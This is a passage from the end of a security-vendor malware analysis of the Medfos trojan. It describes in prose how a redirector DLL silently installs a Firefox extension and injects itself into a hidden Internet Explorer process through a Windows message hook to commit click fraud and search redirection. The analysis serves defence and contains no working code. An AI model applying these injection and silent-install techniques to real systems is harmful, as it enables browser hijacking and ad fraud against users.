as shown in Figures 6 and 7.</p>





<!--image-->
<p style="text-indent: 0pt;text-align: left;"><span><img width="424" height="69" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos6.png"/></span></p>
<!--image-->
<!--caption -->
<p style="text-indent: 0pt;line-height: 12pt;text-align: left;"><br/></p><p class="s3" style="padding-left: 91pt;text-indent: -72pt;text-align: left;">Figure 6: sqlite3_exec inserting the information Firefox requires to load an extension. The GUID is highlighted in red.</p>
<!--end cap-->
<!--image-->
<p style="text-indent: 0pt;line-height: 10pt;text-align: left;"><br/></p><p style="padding-left: 4pt;text-indent: 0pt;text-align: left;"><span><img width="425" height="165" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos7.png"/></span></p>
<!--end image-->
<!--caption-->
<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><p class="s3" style="padding-left: 19pt;text-indent: 0pt;text-align: left;">Figure 7: Creating/dropping the actual .xpi file. GUID is highlighted in red.</p>
<!--end cap-->

<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p><h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">INTERNET EXPLORER REDIRECT</h3>

<p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The DLL module also implements similar ad-clicking and redirecting behaviour for <i>Internet Explorer</i>. However, the implementation for <i>IE</i> is a little more involved. First, using CoInitialize and CoCreateInstance, an instance of iexplore.exe is created. Note that this instance of iexplore.exe lurks in the background without a visible window. SetWindowsHookExW is then called with idHook set to WH_GETMESSAGE and HOOKPROC pointing to a harmless container subroutine that eventually calls CallNextHook.</p><p style="padding-left: 5pt;text-indent: 0pt;text-align: left;">The hook procedure itself need not be malicious, because the purpose of this <i>Windows</i> hook is to get the DLL module loaded into the lurking iexplore.exe process and, as a side effect, into every other active process that monitors messages using either PeekMessage or GetMessage. Once the injection is in place, UnhookWindowsHookEx is called to clean up the hook.</p>

<p style="padding-top: 4pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">In addition to the search result redirection performed through the server at 'googleads.doublee-click.net', as illustrated in Figures 4 and 5, the lurking iexplore.exe simulates another ad-clicking action to generate an additional stream of revenue. Figure 9 shows an instance where the URL of a <i>Google</i> search result page is referred to the additional online advertisement domain.</p>

<!--image-->
<p style="text-indent: 0pt;line-height: 10pt;text-align: left;"><br/></p><p style="padding-left: 5pt;text-indent: 0pt;text-align: left;"><span><img width="457" height="307" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos8.png"/></span></p>
<!--cap-->
<p class="s3" style="padding-top: 6pt;padding-left: 6pt;text-indent: 0pt;text-align: center;">Figure 8: SetWindowsHookExW sets the set_gAMA_fixed export function as HOOKPROC parameter.</p>
<!--end cap-->
<!--img-->
<p style="text-indent: 0pt;line-height: 10pt;text-align: left;"><br/></p><p style="padding-left: 12pt;text-indent: 0pt;text-align: left;"><span><img width="440" height="102" alt="image" src="http://blog.fortinet.com/uploads/media/security-research/medfos9.png"/></span></p>
<!--end img-->
<!--cap-->
<p class="s3" style="padding-top: 6pt;padding-left: 9pt;text-indent: 0pt;text-align: center;">Figure 9: Redirection with InternetOpenUrlW while searching for the keyword 'stock' in Google. Notice that there is an IP prepended to the normal Google search URL.</p>
<!--end cap-->
<p style="text-indent: 0pt;line-height: 7pt;text-align: left;"><br/></p><p style="padding-left: 5pt;text-indent: 0pt;line-height: 11pt;text-align: left;">As for the redirector DLL module discussed here, its ad-clicker functionality provides a method of generating revenue. It is also possible that the author uses the search engine usage information gathered for some other purpose. While the <i>Internet Explorer</i> version of the redirect/ad-clicker functionality causes a major and noticeable slowdown in the browser, the <i>Firefox</i> and <i>Google Chrome</i> extensions are both simple and reliable.</p>

<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p>
<h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">CONCLUSION</h3>
<p style="padding-top: 3pt;padding-left: 5pt;text-indent: 0pt;text-align: left;">The design of the Medfos trojan provides great modularity and extensive protection for the DLL modules that it distributes. It is also able to download and deploy an arbitrary number of DLL modules.</p>
<p style="text-indent: 0pt;line-height: 9pt;text-align: left;"><br/></p>
<h3 style="padding-left: 5pt;text-indent: 0pt;text-align: left;">REFERENCES</h3>
<p style="padding-top: 5pt;padding-left: 36pt;text-indent: -26pt;text-align: left;">[1] <a href="http://developer.chrome.com/extensions/external_extensions.html" class="a" target="_blank">http://developer.chrome.com/extensions/external_extensions.html</a>.</p>
<p style="padding-top: 5pt;padding-left: 36pt;text-indent: -26pt;text-align: left;">[2] <a href="http://www.virusbtn.com/virusbulletin/archive/2014/01/vb201401-Medfos-appendix" class="a" target="_blank">http://www.virusbtn.com/virusbulletin/archive/2014/01/vb201401-Medfos-appendix</a>.</p>
<p style="padding-top: 5pt;padding-left: 36pt;text-indent: -26pt;text-align: left;">[3] <a href="http://research.zscaler.com/2012/09/how-to-install-silently-malicious.html" class="a" target="_blank">http://research.zscaler.com/2012/09/how-to-install-silently-malicious.html</a>.</p>

Source: blog.fortinet.com/post/medfos-an-all-purpose-redirector
